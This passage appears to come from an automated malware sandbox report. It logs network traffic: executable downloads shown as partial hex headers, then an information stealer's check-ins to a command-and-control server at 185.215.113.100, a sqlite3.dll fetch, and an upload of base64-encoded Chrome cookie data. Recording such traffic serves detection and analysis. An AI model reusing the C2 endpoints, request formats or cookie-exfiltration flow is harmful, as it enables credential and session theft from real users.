00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 43 44 31 34 35 35 38 39 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="hwid"F7CD145589561166170430------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="build"leva------GHDHJEBFBFHJECAKFCAA--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="message"browsers------IECAFHDBGHJKFIDHJJJE--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"plugins------FCAAEHJDBKJJKFHJEBKF--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="message"fplugins------DGHJECAFIDAFHJKFCGHI--
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECBGIJDGCAEBFIIECAHost: 185.215.113.100Content-Length: 6535Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 185.215.113.100Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4
